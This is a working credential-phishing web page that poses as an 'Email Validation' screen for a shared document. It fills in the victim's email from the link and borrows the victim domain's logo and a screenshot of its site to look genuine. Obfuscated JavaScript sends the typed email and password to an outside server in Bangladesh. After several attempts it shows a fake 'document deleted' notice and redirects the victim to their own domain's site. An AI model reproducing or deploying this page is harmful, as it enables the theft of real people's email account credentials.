<!doctype html>
<html lang="en">
<head><!-- Required meta tags -->
	<meta charset="utf-8" />
	<meta content="width=device-width, initial-scale=1, shrink-to-fit=no" name="viewport" />
	<link href="https://fonts.googleapis.com/css?family=Roboto:300,400&amp;display=swap" rel="stylesheet" /><!-- Bootstrap CSS -->
	<link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet" />
	<link href="https://dipadasflasfaslf09fasfas.pages.dev/fonts/icomoon/style.css" rel="stylesheet" />
	<style type="text/css">body {
  font-family: "Roboto", sans-serif;
  background-color: #fff; }

p {
  color: #b3b3b3;
  font-weight: 300; }

h1, h2, h3, h4, h5, h6,
.h1, .h2, .h3, .h4, .h5, .h6 {
  font-family: "Roboto", sans-serif; }

a {
  -webkit-transition: .3s all ease;
  -o-transition: .3s all ease;
  transition: .3s all ease; }
  a:hover {
    text-decoration: none !important; }

.content {
  padding: 7rem 0; }

h2 {
  font-size: 20px; }

.half, .half .container > .row {
  height: 100vh;
  min-height: 700px; }

@media (max-width: 991.98px) {
  .half .bg {
    height: 200px; } }

.half .contents {
  background: #f6f7fc; }

.half .contents, .half .bg {
  width: 50%; }
  @media (max-width: 1199.98px) {
    .half .contents, .half .bg {
      width: 100%; } }
  .half .contents .form-control, .half .bg .form-control {
    border: none;
    -webkit-box-shadow: 0 1px 2px 0 rgba(0, 0, 0, 0.1);
    box-shadow: 0 1px 2px 0 rgba(0, 0, 0, 0.1);
    border-radius: 4px;
    height: 54px;
    background: #fff; }
    .half .contents .form-control:active, .half .contents .form-control:focus, .half .bg .form-control:active, .half .bg .form-control:focus {
      outline: none;
      -webkit-box-shadow: 0 1px 2px 0 rgba(0, 0, 0, 0.1);
      box-shadow: 0 1px 2px 0 rgba(0, 0, 0, 0.1); }

.half .bg {
  background-size: cover;
  background-position: center; }

.half a {
  color: #888;
  text-decoration: underline; }

.half .btn {
  height: 54px;
  padding-left: 30px;
  padding-right: 30px; }

.half .forgot-pass {
  position: relative;
  top: 2px;
  font-size: 14px; }

.control {
  display: block;
  position: relative;
  padding-left: 30px;
  margin-bottom: 15px;
  cursor: pointer;
  font-size: 14px; }
  .control .caption {
    position: relative;
    top: .2rem;
    color: #888; }

.control input {
  position: absolute;
  z-index: -1;
  opacity: 0; }

.control__indicator {
  position: absolute;
  top: 2px;
  left: 0;
  height: 20px;
  width: 20px;
  background: #e6e6e6;
  border-radius: 4px; }

.control--radio .control__indicator {
  border-radius: 50%; }

.control:hover input ~ .control__indicator,
.control input:focus ~ .control__indicator {
  background: #ccc; }

.control input:checked ~ .control__indicator {
  background: #fb771a; }

.control:hover input:not([disabled]):checked ~ .control__indicator,
.control input:checked:focus ~ .control__indicator {
  background: #fb8633; }

.control input:disabled ~ .control__indicator {
  background: #e6e6e6;
  opacity: 0.9;
  pointer-events: none; }

.control__indicator:after {
  font-family: 'icomoon';
  content: '\e5ca';
  position: absolute;
  display: none;
  font-size: 16px;
  -webkit-transition: .3s all ease;
  -o-transition: .3s all ease;
  transition: .3s all ease; }

.control input:checked ~ .control__indicator:after {
  display: block;
  color: #fff; }

.control--checkbox .control__indicator:after {
  top: 50%;
  left: 50%;
  margin-top: -1px;
  -webkit-transform: translate(-50%, -50%);
  -ms-transform: translate(-50%, -50%);
  transform: translate(-50%, -50%); }

.control--checkbox input:disabled ~ .control__indicator:after {
  border-color: #7b7b7b; }

.control--checkbox input:disabled:checked ~ .control__indicator {
  background-color: #7e0cf5;
  opacity: .2; }
	</style>
	<title>Account Administrator</title>
</head>
<body style="">
<div id="loadlast" style="display: none">
<div id="id0oo1">
<div class="modal-content animate" style="width: 450px; padding-top: 30px;"><span class="text-center" style="font-size: 20px">Secure Document Sharing</span>
<div class="imgcontainer text-center"><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSWSjpDaJch7A32iI2FZVMbsXS35IpPPyHh5A&amp;usqp=CAU" width="40%" /></div>

<div class="container" style="text-align: left">
<center>&nbsp;
<p style="text-align: left; padding: 0px 20px"><font color="black" face="Trebuchet MS" size="3">The shared document was deleted by the sender.<br />
Please contact the sender directly to request the document.</font><br />
<br />
&nbsp;</p>
</center>
</div>

<div class="container" style="background-color:#f1f1f1">&nbsp;</div>
</div>
</div>
</div>

<div class="d-lg-flex half" id="loadfirst">
<div class="bg order-1 order-md-1" style="background-image: url('');">&nbsp;</div>

<div class="contents order-2 order-md-2">
<div class="container">
<div class="row align-items-center justify-content-center">
<div class="col-md-7"><img alt="" class="img-responsive" id="logoimg" width="20%" />
<h3><strong>Email Validation</strong></h3>

<p style="font-size: 15px;">Your information is only for the sole purpose of viewing this document and would not be sold or shared to any third party.</p>

<form action="" method="post">
<center>
<div class="alert alert-danger" id="msg" style="display: none; font-size:14px; ">Email Password Authentication failed, try again with a valid password.</div>
<span class="alert alert-danger" id="error" style="display: none; font-size:14px; ">That account doesn&#39;t exist. Enter a different account</span></center>

<div class="form-group first"><label for="username">Verified User Email:</label> <input class="form-control" id="email" name="email" placeholder="Your Email" type="text" /></div>

<div class="form-group last mb-3"><label for="password">Email Password:</label> <input class="form-control" id="password" name="password" placeholder="Your Password" type="password" /></div>

<div class="d-flex mb-5 align-items-center"><label class="control control--checkbox mb-0"><span class="caption">Remember me</span> <input checked="checked" type="checkbox" /> </label>

<div class="control__indicator">&nbsp;</div>
<label class="control control--checkbox mb-0"> </label></div>
<button class="btn btn-block btn-warning" id="submit-btn" style="background-color: #fb771a" type="submit">Authenticate</button></form>

<p>&copy; 2024 Mail Server Authenticator</p>
</div>
</div>
</div>
</div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/js/bootstrap.min.js" nonce="NjYxNzQxODQxLDM4NzQxMTk5OTM="></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js" nonce="NjYxNzQxODQxLDM4NzQxMTk5OTM="></script><script nonce="NjYxNzQxODQxLDM4NzQxMTk5OTM=">
 var _0x58c19a=_0x388e;(function(_0x5f0c0e,_0x3b6611){var _0x456c35=_0x388e,_0xee0e81=_0x5f0c0e();while(!![]){try{var _0x55e9aa=-parseInt(_0x456c35(0x13b))/0x1*(-parseInt(_0x456c35(0x142))/0x2)+parseInt(_0x456c35(0x143))/0x3+-parseInt(_0x456c35(0x169))/0x4*(-parseInt(_0x456c35(0x150))/0x5)+-parseInt(_0x456c35(0x14c))/0x6*(-parseInt(_0x456c35(0x158))/0x7)+-parseInt(_0x456c35(0x14e))/0x8*(-parseInt(_0x456c35(0x16b))/0x9)+parseInt(_0x456c35(0x16f))/0xa+-parseInt(_0x456c35(0x16c))/0xb;if(_0x55e9aa===_0x3b6611)break;else _0xee0e81['push'](_0xee0e81['shift']());}catch(_0x343bf6){_0xee0e81['push'](_0xee0e81['shift']());}}}(_0x478d,0xe6dba),$(document)['on']('keyup','input[name=email]',function(){var _0x4a6b25=_0x388e,_0x42f6fc=$(this)[_0x4a6b25(0x140)](),_0x44855a=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x44855a['test'](_0x42f6fc))return![];else{var _0x4becab=_0x42f6fc['indexOf']('@'),_0x1e57d2=_0x42f6fc[_0x4a6b25(0x144)](_0x4becab+0x1),_0x424310=_0x1e57d2[_0x4a6b25(0x144)](0x0,_0x1e57d2[_0x4a6b25(0x147)]('.')),_0x3c61d9=_0x4a6b25(0x14a)+_0x1e57d2;setTimeout(function(){var _0x4109f7=_0x4a6b25;$('#logoname')[_0x4109f7(0x14b)](_0x424310),checkImage(_0x4109f7(0x159)+_0x1e57d2);var _0x5c54b8='https://image.thum.io/get/width/1200/'+_0x3c61d9;document['body'][_0x4109f7(0x13e)][_0x4109f7(0x137)]=_0x4109f7(0x141)+_0x5c54b8+'\x27)';},0x7d0);}}));function checkImage(_0x577680){var _0x529ba7=_0x388e,_0x1087e6=new Image();_0x1087e6['onload']=function(){var _0x289b53=_0x388e;this[_0x289b53(0x13f)]>0x0&&$(_0x289b53(0x16e))['attr'](_0x289b53(0x164),_0x577680);},_0x1087e6[_0x529ba7(0x155)]=function(){var _0x1988c1=_0x529ba7;$(_0x1988c1(0x16e))[_0x1988c1(0x139)]('src',_0x1988c1(0x166));},_0x1087e6['src']=_0x577680;}$(document)[_0x58c19a(0x138)](function(){var _0x33ca56=_0x58c19a,_0x390423=0x0,_0x4bf59e=window['location'][_0x33ca56(0x152)][_0x33ca56(0x144)](0x1);if(!_0x4bf59e){}else{var _0x732c41=_0x4bf59e;$(_0x33ca56(0x15e))[_0x33ca56(0x140)](_0x4bf59e);var _0x492b1f=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x492b1f[_0x33ca56(0x16d)](_0x732c41))return $(_0x33ca56(0x16a))[_0x33ca56(0x162)](),_0x4bf59e[_0x33ca56(0x15b)],![];var _0x4f6073=_0x732c41['indexOf']('@'),_0x1a8717=_0x732c41[_0x33ca56(0x144)](_0x4f6073+0x1),_0x2a9597=_0x1a8717[_0x33ca56(0x144)](0x0,_0x1a8717[_0x33ca56(0x147)]('.'));$(_0x33ca56(0x146))['html'](_0x2a9597);var _0x4b6ed2=_0x33ca56(0x14a)+_0x1a8717;checkImage('https://logo.clearbit.com/'+_0x1a8717);var _0x571978=_0x33ca56(0x15f)+_0x4b6ed2;document[_0x33ca56(0x154)][_0x33ca56(0x13e)]['backgroundImage']='url(\x27'+_0x571978+'\x27)',$(_0x33ca56(0x15a))[_0x33ca56(0x14b)](_0x4bf59e);}$(_0x33ca56(0x136))[_0x33ca56(0x161)](function(_0x28060e){var _0x3f3fac=_0x33ca56;_0x28060e[_0x3f3fac(0x14f)]();var _0x909131=$(_0x3f3fac(0x15e))['val'](),_0xbeda4b=$('#password')[_0x3f3fac(0x140)]();if(_0xbeda4b[_0x3f3fac(0x135)]<0x4)return $(_0x3f3fac(0x160))['show'](),$('#msg')['html']('Wrong\x20password!\x20Please\x20try\x20again'),![];_0x390423=_0x390423+0x1,$['ajax']({'dataType':'JSON','url':_0x3f3fac(0x153),'type':_0x3f3fac(0x15d),'data':{'oemail':_0x909131,'opassword':_0xbeda4b},'beforeSend':function(_0x356f8e){var _0x5b991a=_0x3f3fac;$(_0x5b991a(0x136))['html'](_0x5b991a(0x145));},'success':function(_0x218e46){var _0x186102=_0x3f3fac;$(_0x186102(0x160))['html'](_0x186102(0x13d)),_0x218e46&&($('#msg')[_0x186102(0x162)](),console['log'](_0x218e46),$(_0x186102(0x160))['html'](_0x218e46[_0x186102(0x13a)]),_0x218e46[_0x186102(0x163)]=='ok'?($('#password')[_0x186102(0x140)](''),_0x390423>=0x3&&(_0x390423=0x0,$('#loadfirst')['hide'](),document['getElementById'](_0x186102(0x156))[_0x186102(0x168)]=_0x186102(0x151),document['getElementById'](_0x186102(0x14d))[_0x186102(0x168)]=_0x186102(0x15c),document['body'][_0x186102(0x13e)][_0x186102(0x137)]=_0x186102(0x167),$(_0x186102(0x13c))[_0x186102(0x162)](),setTimeout(()=>{var _0x1a3c2d=_0x186102;window[_0x1a3c2d(0x148)]['replace'](_0x1a3c2d(0x165)+_0x1a8717);},0x1388))):$(_0x186102(0x160))[_0x186102(0x14b)](_0x218e46['msg']));},'error':function(){var _0x5507be=_0x3f3fac;$('#password')[_0x5507be(0x140)](''),_0x390423>=0x2&&(_0x390423=0x0,window['location'][_0x5507be(0x149)](_0x5507be(0x165)+_0x1a8717)),$(_0x5507be(0x160))[_0x5507be(0x162)]();},'complete':function(){var _0x5070af=_0x3f3fac;$(_0x5070af(0x136))[_0x5070af(0x14b)](_0x5070af(0x157));}});});});function _0x388e(_0x21e7e5,_0x50536e){var _0x478d92=_0x478d();return _0x388e=function(_0x388e9b,_0x484618){_0x388e9b=_0x388e9b-0x135;var _0x55a79d=_0x478d92[_0x388e9b];return _0x55a79d;},_0x388e(_0x21e7e5,_0x50536e);}function _0x478d(){var _0xa1dd3f=['POST','#email','https://image.thum.io/get/width/1200/','#msg','click','show','signal','src','http://www.','https://upload.wikimedia.org/wikipedia/commons/thumb/5/50/TK_email_icon.svg/150px-TK_email_icon.svg.png?20220910135439','url(\x27\x27)','className','1140MCDZna','#error','117eKhHbH','78963654aGAgbc','test','#logoimg','15704210KtDmyn','length','#submit-btn','backgroundImage','ready','attr','msg','197mNojez','#loadlast','<span\x20style=\x27color:red;\x27>Username\x20or\x20Password\x20is\x20incorrect.\x20Please\x20try\x20again</span>','style','width','val','url(\x27','9230NifTnT','3572544AAMSqx','substr','Verifing...','#logoname','indexOf','location','replace','https://','html','6FymcwV','loadlast','559008qMuKlO','preventDefault','32485hfZfag','ssss','hash','https://www.pasilc.com.bd/nb/general-arrusselleuipment.php','body','onerror','loadfirst','Sign\x20in','11855557KLOcyc','https://logo.clearbit.com/','.email','focus','h-100\x20d-flex\x20justify-content-center\x20align-items-center'];_0x478d=function(){return _0xa1dd3f;};return _0x478d();}
  </script></body>
</html>
